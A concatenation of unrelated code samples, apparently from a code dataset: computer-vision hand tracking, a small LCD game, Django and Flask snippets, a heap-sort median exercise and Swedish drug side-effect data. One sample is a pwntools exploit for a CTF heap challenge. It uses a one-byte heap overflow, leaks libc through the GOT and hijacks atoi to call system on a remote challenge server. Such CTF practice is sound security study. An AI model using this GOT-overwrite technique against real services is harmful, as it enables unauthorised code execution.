        dist_from_fixedPoint.append(cv2.norm(fixedPoint - hull[i], cv2.NORM_L2))
    #sort index from farthest to nearest
    max_indx = np.argsort(-1*np.array(dist_from_fixedPoint))
    #need to eliminate same points and points at edge
    #results stored in idx_ok, the list of candidate indices of hulls
    idx_ok = []
    for i in range(hull_nbPts):
        idx = max_indx[i]
        if point_not_at_edge(hull[idx,0,0], hull[idx,0,1], img_height, img_width, edge_thresh):
            if(len(idx_ok) == 0):
                idx_ok.append(idx)
            else:
                # accept only if distinct from every already-accepted point
                not_similar = True
                for idx_neighbor in idx_ok:
                    not_similar = (points_not_similar(hull[idx,0,0], hull[idx,0,1], hull[idx_neighbor,0,0], hull[idx_neighbor,0,1],neighbor_thresh))
                    if not not_similar: #if similar break the loop
                        break
                if(not_similar):
                    idx_ok.append(idx)
    return idx_ok
def simple_preprocessing(img):
    """Binarize *img*: grayscale, Gaussian blur, morphological open
    (erode then dilate with an elliptical kernel), then Otsu thresholding."""
    work = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    work = cv2.GaussianBlur(work, (5,5), 0)
    ellipse = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10,10))
    work = cv2.erode(work, ellipse, iterations = 2)
    work = cv2.dilate(work, ellipse, iterations = 2)
    # the fixed threshold (50) is superseded by the Otsu flag
    _, bin_image = cv2.threshold(work, 50, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
    return bin_image
def simple_preprocessing2(img, backGround):
    """Binarize *img* after subtracting a grayscale background frame.

    NOTE(review): the plain `gray-gray2` subtraction on uint8 images wraps
    around for pixels darker than the background; cv2.absdiff may be what
    was intended -- confirm before relying on this variant.
    """
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    gray2 = cv2.cvtColor(backGround, cv2.COLOR_BGR2GRAY)
    gray = gray-gray2
    blur = cv2.GaussianBlur(gray, (5,5), 0)
    #kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10,10))
    #blur = cv2.erode(blur, kernel, iterations = 2)
    #blur = cv2.dilate(blur, kernel, iterations = 2)
    # the fixed threshold (70) is superseded by the Otsu flag
    ret, bin_image = cv2.threshold(blur, 70, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
    return bin_image
def hsv_preprocessing(img):
    """Extract a skin-colored binary mask from *img* via HSV range filtering,
    morphological opening, blur and Otsu thresholding."""
    # empirically chosen 'skin' bounds rescaled to 8-bit HSV
    # (original derivation: H 2-39deg, S 0.15-0.9, V 0.2-0.95)
    skin_lower = np.array([1, 38, 51])
    skin_upper = np.array([28, 250, 242])
    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
    mask = cv2.inRange(hsv, skin_lower, skin_upper)
    # morphological open (erode then dilate) removes speckle noise
    ellipse = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10,10))
    mask = cv2.erode(mask, ellipse, iterations = 2)
    mask = cv2.dilate(mask, ellipse, iterations = 2)
    smoothed = cv2.GaussianBlur(mask, (5,5), 0)
    _, bin_image = cv2.threshold(smoothed, 70, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
    return bin_image
def find_contour_hull(binary_image):
    """Return (largest contour, its convex hull points, hull point indices)
    for *binary_image*; the largest-area contour is assumed to be the hand."""
    contours, hierarchy = cv2.findContours(binary_image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    best_idx = 0
    best_area = 0
    for idx, candidate in enumerate(contours):
        area = cv2.contourArea(candidate)
        if area > best_area:
            best_area = area
            best_idx = idx
    cnt = contours[best_idx]
    hull = cv2.convexHull(cnt)
    hull_idx = cv2.convexHull(cnt, returnPoints = False)
    return cnt, hull, hull_idx
def draws_contour_hull(img, cnt, hull):
    """Return a black canvas of *img*'s shape with the contour drawn in
    green and its convex hull in red."""
    canvas = np.zeros(img.shape, np.uint8)
    cv2.drawContours(canvas, [cnt], 0, (0, 255, 0), 3)
    cv2.drawContours(canvas, [hull], 0, (0, 0, 255), 3)
    return canvas
def eliminate_background(img, backGround, thres_diff):
    """Zero out the pixels of *img* that match *backGround* within
    *thres_diff* on every channel; returns *img* (modified in place).

    Vectorized rewrite of the per-pixel Python loop. Also fixes a uint8
    bug: the old per-channel subtraction wrapped around for pixels darker
    than the background, so near-identical pixels could escape erasure.
    """
    # widen to a signed type before differencing to avoid uint8 wraparound
    diff = np.abs(img.astype(np.int32) - backGround.astype(np.int32))
    # erase a pixel only when no channel differs by more than the threshold
    erase_mask = ~(diff > thres_diff).any(axis=2)
    img[erase_mask] = 0
    return img
'''
Tracking by camera
NOTE: hsv is very color and light sensitive and simple_preprocessing seems stabler
'''
'''
firstSec = 0
camera = cv2.VideoCapture(0)
for i in range(12):
camera.read()
grabbed, backGround = camera.read()
for i in range(12):
grabbed, img = camera.read()
backGround = backGround/2 + img/2
'''
def tracking():
    """Live hand tracker driven by the default camera.

    Grabs frames, segments the moving hand by differencing against a
    reference frame, and overlays contour, hull, convexity defects, center,
    wrist and fingertip estimates. Each composite (raw | binary | annotated)
    frame is written to store2/imgN.jpg until 'q' is pressed.
    """
    camera = cv2.VideoCapture(0)
    _,img = camera.read()
    h,w,d = img.shape
    #out = cv2.VideoWriter('video.avi',-1,1,(3*w,h))
    fourcc = cv2.cv.CV_FOURCC('F', 'M', 'P', '4')
    out = cv2.VideoWriter()
    success = out.open('output.avi',fourcc, 15, (3*w,h), True)
    # let the camera settle; the last grabbed frame becomes the reference
    # background for frame differencing
    waitTime = 100
    for i in range(waitTime):
        _, average = camera.read()
    #average = np.float32(average)
    index_im = 0
    while True:
        grabbed, img = camera.read()
        #alpha = 0.01 #factor of forgetting
        #cv2.accumulateWeighted(img, average, alpha)#img is src, average is dst
        img_diff = cv2.absdiff(img, average)#convert scale and do subtract these 2 images
        #cv2.imshow('img_diff', img_diff)
        #substract background
        #img = eliminate_background(img, backGround, 20)
        #bin_image = simple_preprocessing(img, backGround)
        bin_image = simple_preprocessing(img_diff)
        bin_image2 = bin_image.copy()
        cv2.imshow('binaire', bin_image2)
        # bin_image = hsv_preprocessing(img)
        # cv2.imshow('orig', img)
        # cv2.imshow('bin', bin_image)
        # cv2.waitKey(0)
        cnt, hull, hull_idx = find_contour_hull(bin_image)
        drawing = draws_contour_hull(img, cnt, hull)
        #search the points between each finger by using convexity defects
        #see the doc of opencv to understand implementation details
        convDefs = cv2.convexityDefects(cnt, hull_idx)
        # the four deepest defects approximate the valleys between fingers
        dist_order = np.argsort((-1)*convDefs[:,0,3])
        max4dist = dist_order[0:4]
        max4points = convDefs[max4dist,0,2]
        for i in max4points:
            cv2.circle(drawing, tuple(cnt[i,0]), 5, [255,255,0], 2)
        hull_nbPts = hull.shape[0]
        '''
        #draws all the points constitue the convex hull (for debugging)
        for i in range(hull_nbPts):
            cv2.circle(drawing, tuple(hull[i,0]), 4, [255,0,0], 2)
            cv2.putText(drawing, str(i), tuple(hull[i,0]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, [255,0,0], 1, cv2.CV_AA)
        '''
        #find and draw center of contour
        moments = cv2.moments(cnt)
        if moments['m00']!=0:
            cx = int(moments['m10']/moments['m00']) # cx = M10/M00
            cy = int(moments['m01']/moments['m00']) # cy = M01/M00
            centr=(cx,cy)
            cv2.circle(drawing, centr, 5, [0, 255, 255], 2)
        #find and draw point represents the wrist of the hand
        wrist = find_wrist(centr, cnt, max4points)
        cv2.circle(drawing, wrist, 5, [0, 255, 255], 2)
        edge_thresh = 20
        neighbor_thresh = 20
        fixedPoint = wrist
        idx_ok = simple_detect_fingerTips(hull, img, fixedPoint, edge_thresh, neighbor_thresh)
        #print 'list of idx_ok = ', idx_ok
        # keep at most five candidates (one per finger)
        max_5hull_idx = idx_ok[0:5]
        #print 'first five of idx_ok = ', max_5hull_idx
        for i in max_5hull_idx:
            cv2.circle(drawing, tuple(hull[i,0]), 6, [0,255,0], 2)
            #print hull[i]
        #print dist_from_center
        #cv2.imshow('contour and convex hull', drawing)
        # convert both panels to grayscale so the three panes stack cleanly
        img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        drawing = cv2.cvtColor(drawing, cv2.COLOR_BGR2GRAY)
        '''
        print img.shape
        print bin_image2.shape
        print drawing.shape
        '''
        frame = append_imgs(img, bin_image2, drawing)
        #cv2.imshow('frame', frame)
        #out.write(frame)
        cv2.imwrite("store2/" + "img"+str(index_im) + ".jpg", frame)
        index_im += 1
        if cv2.waitKey(1) & 0xFF == ord("q"):
            break
    camera.release()
    out.release()
    #self.out = None
    cv2.destroyAllWindows()
def main():
    """Single-image demo of the pipeline.

    Segments a hand photo and displays the contour, convex hull, convexity
    defects, center, wrist and the single strongest fingertip candidate.
    """
    image_name = "hand_in_BG5.png"
    img = cv2.imread(image_name)
    bin_image = simple_preprocessing(img)
    #bin_image = hsv_preprocessing(img)
    cv2.imshow('orig', img)
    cv2.imshow('bin', bin_image)
    cv2.waitKey(0)
    cnt, hull, hull_idx = find_contour_hull(bin_image)
    drawing = draws_contour_hull(img, cnt, hull)
    #search the points between each finger by using convexity defects
    #see the doc of opencv to understand implementation details
    convDefs = cv2.convexityDefects(cnt, hull_idx)
    # the four deepest defects approximate the valleys between fingers
    dist_order = np.argsort((-1)*convDefs[:,0,3])
    max4dist = dist_order[0:4]
    max4points = convDefs[max4dist,0,2]
    for i in max4points:
        cv2.circle(drawing, tuple(cnt[i,0]), 5, [255,255,0], 2)
    hull_nbPts = hull.shape[0]
    '''
    #draws all the points constitue the convex hull (for debugging)
    for i in range(hull_nbPts):
        cv2.circle(drawing, tuple(hull[i,0]), 4, [255,0,0], 2)
        cv2.putText(drawing, str(i), tuple(hull[i,0]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, [255,0,0], 1, cv2.CV_AA)
    '''
    #find and draw center of contour
    moments = cv2.moments(cnt)
    if moments['m00']!=0:
        cx = int(moments['m10']/moments['m00']) # cx = M10/M00
        cy = int(moments['m01']/moments['m00']) # cy = M01/M00
        centr=(cx,cy)
        cv2.circle(drawing, centr, 5, [0, 255, 255], 2)
    #find and draw point represents the wrist of the hand
    wrist = find_wrist(centr, cnt, max4points)
    cv2.circle(drawing, wrist, 5, [0, 255, 255], 2)
    edge_thresh = 20
    neighbor_thresh = 20
    fixedPoint = wrist
    idx_ok = simple_detect_fingerTips(hull, img, fixedPoint, edge_thresh, neighbor_thresh)
    #print 'list of idx_ok = ', idx_ok
    # unlike tracking(), only the single best fingertip candidate is shown
    max_5hull_idx = idx_ok[0:1]
    #print 'first five of idx_ok = ', max_5hull_idx
    for i in max_5hull_idx:
        cv2.circle(drawing, tuple(hull[i,0]), 6, [0,255,0], 2)
        #print hull[i]
    #print dist_from_center
    cv2.imshow('contour and convex hull', drawing)
    k = cv2.waitKey(0)
# Entry point: run the live-camera tracker. The single-image demo (main())
# is kept commented out for reference.
if __name__ == "__main__":
#    main()
    tracking()
|
4,863 | aeaab602cbb9fa73992eb5259e8603ecb11ba333 | import mlcd,pygame,time,random
# Characters used to render the player and the obstacles on the LCD.
PLAYER_CHAR=">"
OBSTACLE_CHAR="|"
# Two rows of 12 cells: the playfield part of the 16x2 LCD (the remaining
# columns carry the "|scr" / score suffix added when drawing).
screenbuff=[[" "," "," "," "," "," "," "," "," "," "," "," "],
            [" "," "," "," "," "," "," "," "," "," "," "," "]]
# player: column, row and running score.
player={"position":0,"line":0,"score":000}
# game: tick rate (ticks per second), difficulty level (caps the number of
# on-screen obstacles) and current obstacle count.
game={"speed":4.05,"level":2.5,"obstacle":0}
# latest key states refreshed by keypress() ("next" is currently unused).
keys={"space":False,"quit":False,"next":False}
def keypress(): #get keypresses
    """Poll pygame events and refresh the global *keys* flags.

    Clears all flags first so each call reports only the newest events:
    "space" on a space keydown, "quit" on an escape keyup.
    """
    global keys
    for flag in ("space", "quit", "next"):
        keys[flag] = False
    for event in pygame.event.get():
        space_pressed = event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE
        escape_released = event.type == pygame.KEYUP and event.key == pygame.K_ESCAPE
        if space_pressed:
            keys["space"] = True
        elif escape_released:
            keys["quit"] = True
done=False
#initialize mlcd as 16x2 character lcd
mlcd.init(16,2)
# Tick timer: the game advances once every 1/speed seconds.
lasttime=time.time()
curtime=0.0
while not done:
    curtime=time.time()
    if (curtime-lasttime>1/game["speed"]):
        lasttime=curtime
        # An obstacle reaching the player's column counts as passed:
        # increment score, drop the on-screen obstacle count, and ramp up
        # both the allowed obstacle count and the tick rate.
        if screenbuff[0][player["position"]]==OBSTACLE_CHAR or screenbuff[1][player["position"]]==OBSTACLE_CHAR:
            player["score"]+=1
            game["obstacle"]-=1
            game["level"]+=0.5
            game["speed"]+=0.05
        #if((game["level"]+2)%game["posmovthres"]==0 and player["position"]<12 and screenbuff[player["line"]][player["position"]+1]!=OBSTACLE_CHAR and screenbuff[player["line"]][player["position"]+2]!=OBSTACLE_CHAR):
        #    player["position"]+=1
        #move everything one place to the left
        for lindex,lin in enumerate(screenbuff,start=0):
            for index,pos in enumerate(lin, start=0):
                if index>0:
                    screenbuff[lindex][index-1]=pos
        #add new chars at end of buff , obstacles if there is a gap
        screenbuff[0][-1]=" "
        screenbuff[1][-1]=" "
        # NOTE(review): the elif branches only spawn in the row that already
        # has an obstacle in the previous column — presumably to keep one
        # row passable; confirm intent.
        if screenbuff[0][-2] != OBSTACLE_CHAR and screenbuff[1][-2]!=OBSTACLE_CHAR:
            if game["obstacle"]<int(game["level"]) and random.choice([0,1]):
                lin_temp=random.choice([0,1])
                screenbuff[lin_temp][-1]=OBSTACLE_CHAR
                game["obstacle"]+=1
        elif screenbuff[0][-2] != OBSTACLE_CHAR:
            if game["obstacle"]<int(game["level"]) and random.choice([0,1]):
                lin_temp=random.choice([0,1])
                if(lin_temp==1):
                    screenbuff[lin_temp][-1]=OBSTACLE_CHAR
                    game["obstacle"]+=1
        elif screenbuff[1][-2] != OBSTACLE_CHAR:
            if game["obstacle"]<int(game["level"]) and random.choice([0,1]):
                lin_temp=random.choice([0,1])
                if(lin_temp==0):
                    screenbuff[lin_temp][-1]=OBSTACLE_CHAR
                    game["obstacle"]+=1
        #check for collision
        if screenbuff[player["line"]][player["position"]]==OBSTACLE_CHAR:
            done=True #player lost
        #add player to the buffer
        screenbuff[player["line"]][player["position"]]=PLAYER_CHAR
        #ready the lines for drawing on lcd (playfield + "|" + score panel)
        lines=[''.join(screenbuff[0]) + "|scr",
               ''.join(screenbuff[1]) + "|"+str(player["score"])]
        mlcd.draw(lines)
        #remove player from buffer
        screenbuff[player["line"]][player["position"]]=" "
        #get keypresses
        keypress()
        #modify player line (move the player) if space is pressed
        if keys["space"]:
            if player["line"]==0:
                player["line"]=1
            else:
                player["line"]=0
        #quit
        if keys["quit"]:
            print("game quit")
            done=True
pygame.quit()
|
4,864 | b80ccee42489aefb2858b8491008b252f6a2b9b7 | ii = [('CookGHP3.py', 2), ('MarrFDI.py', 1), ('GodwWSL2.py', 2), ('ChanWS.py', 6), ('SadlMLP.py', 1), ('WilbRLW.py', 1), ('AubePRP2.py', 1), ('MartHSI2.py', 1), ('WilbRLW5.py', 1), ('KnowJMM.py', 1), ('AubePRP.py', 2), ('ChalTPW2.py', 1), ('ClarGE2.py', 2), ('CarlTFR.py', 3), ('SeniNSP.py', 4), ('GrimSLE.py', 1), ('RoscTTI3.py', 1), ('CookGHP2.py', 1), ('CoolWHM.py', 1), ('DaltJMA.py', 1), ('NewmJLP.py', 1), ('GodwWLN.py', 3), ('MereHHB3.py', 1), ('MartHRW.py', 2), ('BentJRP.py', 23), ('ThomGLG.py', 1), ('StorJCC.py', 1), ('LewiMJW.py', 1), ('WilbRLW3.py', 1), ('FitzRNS2.py', 1), ('MartHSI.py', 1), ('EvarJSP.py', 5), ('DwigTHH.py', 4), ('TaylIF.py', 1), ('WordWYR.py', 1), ('WaylFEP.py', 1)] |
4,865 | b4992a5b396b6809813875443eb8dbb5b00eb6a9 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Import the otb applications package
import otbApplication
def ComputeHaralick(image, chan, xrad, yrad):
    """Run OTB's HaralickTextureExtraction and write HaralickTextures.tif.

    image: path to the input raster; chan: band index to process;
    xrad/yrad: x and y radii of the sliding window used for the textures.
    """
    # Create an instance of the HaralickTextureExtraction application.
    HaralickTextureExtraction = otbApplication.Registry.CreateApplication("HaralickTextureExtraction")
    # The following lines set all the application parameters:
    HaralickTextureExtraction.SetParameterString("in", image)
    HaralickTextureExtraction.SetParameterInt("channel", int(chan))
    HaralickTextureExtraction.SetParameterInt("parameters.xrad", int(xrad))
    HaralickTextureExtraction.SetParameterInt("parameters.yrad", int(yrad))
    HaralickTextureExtraction.SetParameterString("texture","simple")
    HaralickTextureExtraction.SetParameterString("out", "HaralickTextures.tif")
    # Execute and write the output file.
    HaralickTextureExtraction.ExecuteAndWriteOutput()
    # Fix: parenthesized print works under both Python 2 and 3
    # (the bare `print "..."` statement was Python-2-only syntax).
    print("HaralickTextures.tif a été écrit")
|
4,866 | 49c15f89225bb1dd1010510fe28dba34f6a8d085 | # -*- coding: utf-8 -*-
from sqlalchemy import or_
from ..extensions import db
from .models import User
def create_user(username):
    """Create a new User and stage it in the session (commit is the caller's job)."""
    new_user = User(username)
    db.session.add(new_user)
    return new_user
def get_user(user_id=None, **kwargs):
    """Fetch a user by primary key, or by ``username`` keyword.

    Raises NotImplementedError when neither lookup key is supplied.
    Fix: ``kwargs.pop("username")`` without a default raised KeyError when
    the keyword was absent, so the NotImplementedError was unreachable.
    """
    if user_id is not None:
        return User.query.get(user_id)
    username = kwargs.pop("username", None)
    if username is not None:
        return User.query.filter_by(username=username).first()
    raise NotImplementedError
def get_user_like(query):
    """Return up to 10 users whose username contains *query*.

    Fix: ``or_(User.username,like('%...'))`` used a comma instead of a dot,
    making ``like`` an undefined name (NameError at call time); the intended
    expression is ``User.username.like(...)``.
    """
    return User.query.filter(User.username.like('%' + query + '%')).limit(10).all()
|
4,867 | c31c59d172b2b23ca4676be0690603f33b56f557 | from django.contrib import admin
from django.urls import path
from . import views
# URL routes for this app: product list, search, and detail pages.
urlpatterns = [
    path('', views.skincare, name="skin"),
    path('productSearch/', views.productSearch, name="productSearch"),
    path('detail/', views.detail, name="detail"),
]
4,868 | fbcbad9f64c0f9b68e29afde01f3a4fdba012e10 | """
Массив размером 2m + 1, где m — натуральное число, заполнен случайным образом. Найдите в массиве медиану.
Медианой называется элемент ряда, делящий его на две равные части:
в одной находятся элементы, которые не меньше медианы, в другой — не больше медианы.
Примечание: задачу можно решить без сортировки исходного массива.
Но если это слишком сложно, используйте метод сортировки, который не рассматривался на уроках
(сортировка слиянием также недопустима).
"""
"""В этой задаче как раз могла бы пригодиться быстрая сортировка Хоара или слиянием.
"Но без них не знаю, как можно написать более менее оптимизировано"""
import random

# Array length must be odd: 2m + 1 elements for a natural m.
m = random.randint(5, 10)
# Random floats on [0; 49]; note random.uniform includes the upper bound,
# unlike range and most other functions.
# Rounded to 3 decimals for readability.
mas = [round(random.uniform(0, 49), 3) for i in range(2 * m + 1)]
print(f'Исходный список: {mas}')
# Heap sort (no library sorting used).
def heapify(array, size, ind):
    """Sift array[ind] down so the subtree rooted at ind is a max-heap.

    Only the first *size* elements are considered part of the heap.
    """
    left = 2 * ind + 1
    right = 2 * ind + 2
    largest = ind
    if left < size and array[left] > array[largest]:
        largest = left
    if right < size and array[right] > array[largest]:
        largest = right
    if largest == ind:
        return
    array[ind], array[largest] = array[largest], array[ind]
    heapify(array, size, largest)
def heap_sort(array):
    """Sort *array* in place, ascending, via heap sort."""
    def _sift_down(a, size, root):
        # Iterative sift-down; same effect as the recursive helper above.
        while True:
            largest = root
            l, r = 2 * root + 1, 2 * root + 2
            if l < size and a[l] > a[largest]:
                largest = l
            if r < size and a[r] > a[largest]:
                largest = r
            if largest == root:
                return
            a[root], a[largest] = a[largest], a[root]
            root = largest

    n = len(array)
    # Build a max-heap (indices past n//2-1 are leaves and sift out as no-ops).
    for i in range(n, -1, -1):
        _sift_down(array, n, i)
    # Repeatedly move the current maximum to the end and restore the heap.
    for end in range(n - 1, 0, -1):
        array[end], array[0] = array[0], array[end]
        _sift_down(array, end, 0)
# Sort in place; the median of 2m+1 values is then the middle element.
heap_sort(mas)
print(f'Отсортированный список по возрастанию: {mas}')
print(f'Медиана: {mas[len(mas) // 2]}')

# Cheat-mode cross-check via the standard library :)
import statistics
print(statistics.median(mas))
|
4,869 | efe13de4ed5a3f42a9f2ece68fd329d8e3147ca2 | {'_data': [['Common', [['Skin', u'Ospecifika hud-reaktioner'], ['General', u'Tr\xf6tthet']]],
           ['Uncommon',
            [['GI',
              u'Buksm\xe4rta, diarr\xe9, f\xf6r-stoppning, illam\xe5ende (dessa symptom g\xe5r vanligt-vis \xf6ver vid fortsatt behandling).']]],
           ['Rare',
            [['Blood', u'Hemolytisk anemi'],
             ['Immune system',
              u'\xd6verk\xe4nslighets-reaktioner (urtikaria, angioneurotiskt \xf6dem, feber, dyspn\xe9, tr\xe5nghetsk\xe4nsla i svalget, bronkospasm, hypotension och br\xf6stsm\xe4rta). Dessa h\xe4ndelser har rapporterats efter singeldos. L\xe4kemedels-\xf6verk\xe4nslighet Hepatit'],
             ['Hepato',
              u'Leversvikt, ibland med d\xf6dlig utg\xe5ng, \xf6verg\xe5ende och reversibla f\xf6r\xe4ndringar av leverfunktionstest.'],
             ['Skin', u'Hudutslag'],
             ['Renal',
              u'F\xf6rh\xf6jt plasma-kreatinin (vanligtvis ringa; normaliseras under fortsatt behandling)'],
             ['Reproductive system', u'Erektil dysfunktion'],
             ['General', u'Feber']]],
           ['Very rare',
            [['Blood',
              u'F\xf6r\xe4ndringar i blodbilden (leukopeni, Trombo-cytopeni). Detta \xe4r normalt reversibelt. Agranulocytos eller pancytopeni ibland med benm\xe4rgs-hypoplasi eller aplasi.'],
             ['Immune system', u'Anafylaktisk chock (rapporterat efter singeldos).'],
             ['Psychiatric',
              u'Mental f\xf6rvirring (reversibel), depression och hallucinationer, s\xe4rskilt hos \xe4ldre och sv\xe5rt sjuka.'],
             ['Nervous system',
              u'Huvudv\xe4rk (ibland allvarlig), yrsel och reversibla tillst\xe5nd med ofrivilliga r\xf6relser'],
             ['Eye', u'Dimsyn (reversibel), troligen orsakade av ackommodations-st\xf6rningar'],
             ['Cardiac', u'Som med andra H2-receptor-antagonister: bradykardi och AV-block'],
             ['Vascular', u'Vaskulit'],
             ['GI', u'Akut pankreatit'],
             ['Hepato',
              u'Hepatit (hepatocellul\xe4r, kanalikul\xe4r eller blandad art) med eller utan gulsot, Detta \xe4r vanligtvis reversibelt.'],
             ['Skin', u'Erythema multiforme, alopeci'],
             ['Musculoskeletal', u'Artralgi, myalgi'],
             ['Renal', u'Akut interstitiell nefrit'],
             ['Reproductive system',
              u'Reversibel impotens, br\xf6stsymptom och andra tillst\xe5nd (s\xe5som gynekomasti och galaktorr\xe9)']]]],
 '_note': u' ?MSFU',
 '_pages': [4, 6],
 u'_rank': 23,
 u'_type': u'MSFU'}
4,870 | eeedf4930a7fa58fd406a569db6281476c2e3e35 | #+++++++++++++++++++exp.py++++++++++++++++++++
#!/usr/bin/python
# -*- coding:utf-8 -*-
#Author: Squarer
#Time: 2020.11.15 20.20.51
#+++++++++++++++++++exp.py++++++++++++++++++++
from pwn import*
#context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./npuctf_2020_easyheap')
libc = ELF('./libc-2.27.so')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
def add(size,cont):
    # Menu option 1: allocate a heap chunk of *size* bytes holding *cont*.
    sh.sendlineafter('Your choice :','1')
    sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))
    sh.sendlineafter('Content:',str(cont))
def edit(index,cont):
    # Menu option 2: overwrite chunk *index*'s content (sendafter: no newline).
    sh.sendlineafter('Your choice :','2')
    sh.sendlineafter('Index :',str(index))
    sh.sendafter('Content: ',str(cont))
def delete(index):
    # Menu option 4: free chunk *index*.
    sh.sendlineafter('Your choice :','4')
    sh.sendlineafter('Index :',str(index))
def show(index):
    # Menu option 3: print the content of chunk *index* (used for leaks).
    sh.sendlineafter('Your choice :','3')
    sh.sendlineafter('Index :',str(index))
def show_addr(name,addr):
    # Log a leaked address with pwntools' success formatting.
    log.success('The '+str(name)+' Addr:' + str(hex(addr)))
# NOTE(review): the local process handle is immediately replaced by the
# remote connection; comment one of the two out as appropriate.
sh = process('./npuctf_2020_easyheap')
sh = remote('node3.buuoj.cn',27634)
# Step 1 (extend): overflow chunk 0 by one byte to enlarge chunk 1's
# size field to 0x41, then free it.
add(0x18,'A'*8)
add(0x18,'B'*8)
edit(0,'A'*0x18+'\x41')
delete(1)
# Step 2 (leak): reallocate over the freed region, point the record at
# atoi@GOT, and read it back to compute the libc base.
add(0x38,'A'*8) #1
payload = 'A'*0x10 + p64(0) + p64(0x21)
payload += p64(0x38) + p64(elf.got['atoi'])
edit(1,payload)
show(1)
sh.recvuntil('Content : ')
libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - libc.sym['atoi']
system_addr = libc_addr + libc.sym['system']
show_addr('libc_addr',libc_addr)
show_addr('system_addr',system_addr)
# Step 3 (hijack): overwrite atoi@GOT with system().
edit(1,p64(system_addr))
#gdb.attach(sh,'b*0x400E6D')
sh.interactive()
|
4,871 | ebbc6f9115e6b4ca7d1050a59cf175d123b6f3aa | from flask import Flask
from threading import Timer
from crypto_crawler.const import BITCOIN_CRAWLING_PERIOD_SEC, COIN_MARKET_CAP_URL
from crypto_crawler.crawler import get_web_content, filter_invalid_records
app = Flask(__name__)
# Global flag: cleared by the /pause endpoint to stop rescheduling crawls.
crawl_enabled = True
def crawl_bitcoin_price():
    """Run one crawl pass, then reschedule itself unless paused."""
    print("start crawling!")
    prices = get_web_content(COIN_MARKET_CAP_URL)
    prices = filter_invalid_records(prices)
    # Persistence/alerting hooks (currently disabled):
    # write_many(INSERT_CRYPTO_MANY, list(map(lambda x: x.to_tuple(), prices)))
    # alarm_arbitrage(prices)
    # alarm_prediction()
    if not crawl_enabled:
        print("crawl paused!")
        return
    # Schedule the next pass.
    Timer(BITCOIN_CRAWLING_PERIOD_SEC, crawl_bitcoin_price).start()
# Control endpoint: stop scheduling further crawls.
@app.route("/pause")
def pause():
    global crawl_enabled
    crawl_enabled = False
    return "PAUSED!"
# Health-check endpoint (static response).
@app.route("/status")
def status():
    return "100%"
# Landing page.
@app.route("/")
def default():
    return "SAMPLE TRADING SYSTEM"
if __name__ == "__main__":
    # Kick off the first crawl pass, then serve the control endpoints.
    crawl_bitcoin_price()
    app.run()
|
4,872 | 8c7dcff80eeb8d7d425cfb25da8a30fc15daf5f9 | import tcod as libtcod
import color
from input_handlers import consts
from input_handlers.ask_user_event_handler import AskUserEventHandler
class SelectIndexHandler(AskUserEventHandler):
    """
    Handles asking the user for an index (map position).

    The cursor starts on the player's tile and moves with the usual
    movement keys (shift/ctrl/alt multiply the step) or the mouse;
    a confirm key or a left click passes the position to on_index_selected().
    """
    def __init__(self, engine):
        super().__init__(engine)
        # Start the cursor on the player's tile.
        player = self.engine.player
        engine.mouse_location = (player.x, player.y)
    def on_render(self, console):
        """
        Highlight the tile under the cursor by inverting its colors.
        """
        super().on_render(console)
        x, y = self.engine.mouse_location
        console.tiles_rgb['bg'][x, y] = color.white
        console.tiles_rgb['fg'][x, y] = color.black
    def ev_keydown(self, event):
        # Movement keys move the cursor; confirm keys select the tile;
        # anything else falls through to the parent handler.
        key = event.sym
        if key in consts.MOVE_KEYS:
            modifier = 1  # Holding modifier keys will speed up key movement
            if event.mod & (libtcod.event.KMOD_LSHIFT | libtcod.event.KMOD_RSHIFT):
                modifier *= 5
            if event.mod & (libtcod.event.KMOD_LCTRL | libtcod.event.KMOD_RCTRL):
                modifier *= 10
            if event.mod & (libtcod.event.KMOD_LALT | libtcod.event.KMOD_RALT):
                modifier *= 20
            x, y = self.engine.mouse_location
            dx, dy = consts.MOVE_KEYS[key]
            x += dx * modifier
            y += dy * modifier
            # Restrict the cursor index to the map size.
            x = max(0, min(x, self.engine.game_map.width - 1))
            y = max(0, min(y, self.engine.game_map.height - 1))
            self.engine.mouse_location = (x, y)
            return None
        elif key in consts.CONFIRM_KEYS:
            return self.on_index_selected(*self.engine.mouse_location)
        return super().ev_keydown(event)
    def ev_mousebuttondown(self, event):
        """
        Left click confirms a selection (only inside map bounds).
        """
        if self.engine.game_map.in_bounds(*event.tile):
            if event.button == 1:
                return self.on_index_selected(*event.tile)
        return super().ev_mousebuttondown(event)
    def on_index_selected(self, x, y):
        # Subclass hook: receives the chosen (x, y); must be overridden.
        raise NotImplementedError()
|
4,873 | 0b1e6a95ee008c594fdcff4e216708c003c065c8 | # -*- coding: utf-8 -*-
import logging
from django.shortcuts import render, redirect, HttpResponse
from django.core.urlresolvers import reverse
from django.conf import settings
from django.contrib.auth import logout, login, authenticate
from django.contrib.auth.hashers import make_password
from django.core.paginator import Paginator, InvalidPage, EmptyPage, PageNotAnInteger
from django.db import connection
from django.db.models import Count
from models import *
from forms import *
import json
logger = logging.getLogger('blog.views')
# Create your views here.
def global_setting(request):
    """Shared template context: site settings, nav categories, archives,
    and the most-commented articles.

    Returns locals() so every name bound here becomes a template variable
    (presumably registered as a template context processor — confirm in
    settings).
    """
    # Basic site info from settings.
    SITE_URL = settings.SITE_URL
    SITE_NAME = settings.SITE_NAME
    SITE_DESC = settings.SITE_DESC
    # Navigation: the first six categories.
    category_list = Category.objects.all()[:6]
    # Article archive (distinct publish dates).
    archive_list = Article.objects.distinct_date()
    # Comment ranking: articles ordered by comment count.
    # Fix: a stray garbled character sat alone on a line here (the remnant
